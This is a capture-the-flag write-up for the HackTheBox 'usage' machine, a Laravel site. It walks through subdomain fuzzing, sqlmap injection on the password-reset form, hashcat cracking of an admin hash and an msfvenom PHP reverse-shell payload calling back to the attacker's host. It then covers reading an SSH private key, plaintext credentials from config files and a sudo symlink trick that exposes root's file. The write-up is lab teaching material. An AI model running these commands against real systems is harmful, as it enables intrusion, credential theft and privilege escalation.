HTB: usage Writeup

Machine Information

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

• Enumeration: ⭐⭐☆☆☆
• Real-world: ⭐⭐⭐☆☆
• CVE: ⭐⭐☆☆☆
• CTF-like: ⭐⭐☆☆☆

Summary

usage is a Easy-difficulty Linux machine running Ubuntu Linux with nginx and Laravel 10.10. The exploitation path involves subdomain enumeration to discover the admin panel, SQL injection on the password reset endpoint to extract credentials, credential cracking, admin panel access, reverse shell deployment, lateral movement through credential discovery, and privilege escalation via a symbolic link trick.

TL;DR: Subdomain enumeration → SQL injection → Credential cracking → Admin access → Reverse shell → Lateral movement → Privilege escalation → Root.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.23.187

Results:

22/tcp  open  ssh  OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http  nginx 1.18.0 (Ubuntu)

Service Enumeration

Hostname: usage.htb

echo "10.129.23.187 usage.htb" >> /etc/hosts

Technology Stack:

PHP 8.1.2, Laravel 10.10, encore/laravel-admin 1.8.18, MySQL, nginx 1.18.0

Subdomain Discovery

Using ffuf and whatweb to enumerate subdomains:

ffuf -w /path/to/wordlist -u http://usage.htb -H "Host: FUZZ.usage.htb" -mc 200,301,302
whatweb http://admin.usage.htb

Discovered: admin.usage.htb — Laravel admin panel (encore/laravel-admin 1.8.18)

Vulnerability Assessment

Identified Vulnerabilities:

• SQL Injection — The password reset endpoint (/forget-pass) contains SQL injection on the email parameter.
• Weak Password Hashing — Bcrypt hash crackable via hashcat.
• Misconfigured Sudo Permissions — Allows symbolic link exploitation.

Initial Foothold

SQL Injection on Password Reset

The password reset endpoint is vulnerable to SQL injection on the email parameter.

sqlmap -u "http://usage.htb/forget-pass" --data="email=*" -p email --dbs

Findings:

• Databases: information_schema, performance_schema, usage_blog
• Table: admin_users

Dump admin credentials:

sqlmap -u "http://usage.htb/forget-pass" --data="email=*" -p email -D usage_blog -T admin_users --dump

Result: admin user with bcrypt hash:

$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2

Hash Cracking

Using hashcat to crack the bcrypt hash:

hashcat -m 3200 hash.txt /path/to/wordlist

Cracked: admin:whatever1

Admin Panel Access

Login to the Laravel admin panel at http://admin.usage.htb/admin/auth/login:

Username: admin
Password: whatever1

Reverse Shell Deployment

Generate a PHP meterpreter payload:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.x LPORT=4444 > shell.php

Deploy the payload through the admin panel. This lands as user dash.

User Compromise

SSH Key Discovery

From the initial reverse shell as user dash, locate SSH keys:

cat /home/dash/.ssh/id_rsa

Alternatively, use the SSH key directly for remote access.

Credential Discovery

Examine the .monitrc configuration file in the home directory:

cat ~/.monitrc

Contents:

set httpd port 2812, allow admin:3nc0d3d_pa$$w0rd

Additional credentials found in .env:

staff:s3cr3t_c0d3d_1uth

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Lateral Movement

SSH as xander

Using the credentials found in .monitrc:

ssh xander@usage.htb
# Password: 3nc0d3d_pa$$w0rd

Privilege Escalation

Enumeration

Check sudo permissions:

sudo -l

Result:

xander can run /usr/bin/usage_management without password

Exploitation (Root/Administrator)

The usage_management tool performs a backup operation when option 1 is selected. Exploit this via a symbolic link trick:

cd /home/xander
touch @root.txt
ln -sf /root/root.txt root.txt

Then execute the management tool:

sudo /usr/bin/usage_management

Select option 1 (backup) at the terminal prompt. This will copy the root flag to the current directory due to the symbolic link.

Root Flag

cat root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A[Reconnaissance: nmap, ffuf, whatweb] --> B[SQL Injection: forget-pass endpoint]
    B --> C[Credential Cracking: hashcat]
    C --> D[Admin Panel Access: encore/laravel-admin]
    D --> E[Reverse Shell: msfvenom payload]
    E --> F[User Access: dash shell]
    F --> G[Credential Discovery: .monitrc config]
    G --> H[Lateral Movement: SSH as xander]
    H --> I[Privilege Escalation: symlink trick]
    I --> J[Root Access: read root.txt]

Tools Used

Vulnerability Reference

Key Learnings

• Subdomain enumeration is critical — admin panels may not be on primary domains. Use ffuf and similar tools.
• SQL injection in password reset endpoints is a high-impact vulnerability that can expose user credentials.
• Configuration files like .monitrc and .env often contain plaintext credentials for lateral movement.
• Symbolic link exploits can bypass file permission protections when combined with sudo commands that don’t properly validate file paths.
• Credential reuse across multiple accounts and services is a common weakness; extracted credentials should be tested across all discovered services.
• Hash cracking with tools like hashcat can be feasible for bcrypt hashes when the wordlist is comprehensive.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #SQLInjection #LaravelAdmin #SymlinkExploit #PrivilegeEscalation